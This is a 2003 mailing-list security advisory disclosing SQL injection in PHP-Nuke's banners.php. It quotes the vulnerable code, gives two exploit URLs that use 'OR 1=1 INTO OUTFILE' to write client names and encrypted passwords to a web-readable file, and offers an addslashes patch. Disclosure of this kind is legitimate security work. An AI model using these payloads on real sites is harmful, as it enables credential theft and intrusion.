Vulnwatch mailing list archives
PHP-Nuke : banners.php
From: "Frog Man" <leseulfrog () hotmail com>
Date: Sat, 22 Mar 2003 14:35:19 +0100
Informations : °°°°°°°°°°°°°° language : PHP Website : http://www.phpnuke.org Versions : 5.6, 6.0, 6.5 RC1, 6.5 RC2, 6.5 RC3, 6.5 Problem : SQL Injection Config : This will work if magic_quotes_gpc=OFF PHP Code/Location : °°°°°°°°°°°°°°°°°°° banners.php : ------------------------------------------------------------------------ [...] function bannerstats($login, $pass) { global $prefix, $db, $sitename;$sql = "SELECT cid, name, passwd FROM ".$prefix."_bannerclient WHERE login='$login'";
$result = $db->sql_query($sql); $row = $db->sql_fetchrow($result); [...]function change_banner_url_by_client($login, $pass, $cid, $bid, $url, $alttext) {
global $prefix, $db; $sql = "SELECT passwd FROM ".$prefix."_bannerclient WHERE cid='$cid'"; $result = $db->sql_query($sql); $row = $db->sql_fetchrow($result); $passwd = $row[passwd]; if (!empty($pass) AND $pass==$passwd) { $alttext = ereg_replace("\"", "", $alttext); $alttext = ereg_replace("'", "", $alttext);$db->sql_query("UPDATE ".$prefix."_banner SET clickurl='$url', alttext='$alttext' WHERE bid='$bid'");
echo "<br><center>"; if ($url != "") { echo "You changed the URL<br>"; } if ($alttext != "") { echo "You changed the Alternate Text"; }echo "<br><br><a href=\"javascript:history.go(-1)\">Back to Stats Page</a></center>";
} else {echo "<center><br>Your login/password doesn't match.<br><br>Please <a href=\"banners.php?op=login\">login again</a></center>";
} } switch($op) { [...] case "Ok": bannerstats($login, $pass); break; case "Change": change_banner_url_by_client($login, $pass, $cid, $bid, $url, $alttext); break; } [...] ?> ------------------------------------------------------------------------ Exploit : °°°°°°°°°This will save id, name and crypted password into http://[target]/banners1.txt :
http://[target]/banners.php?op=Ok&login='%20OR%201=1%20INTO%20OUTFILE%20'[path/to/site]/banners1.txt This will save crypted password into http://[target]/banners2.txt : http://[target]/banners.php?op=Change&cid='%20OR%201=1%20INTO%20OUTFILE%20'[path/to/site]/banners2.txt Patch : °°°°°°° A patch can be found on http://www.phpsecure.info . Into banners.php, put befoire the switch : -------------------------- $cid=addslashes($cid); $login=addslashes($login); -------------------------- More details : °°°°°°°°°°°°°° in French : http://www.frogsecure.com/tutos/PHP-Nuke-banners.php.txt frog-m@n _________________________________________________________________ Hotmail: votre e-mail gratuit ! http://www.fr.msn.be/hotmail
Current thread:
- PHP-Nuke : banners.php Frog Man (Mar 22)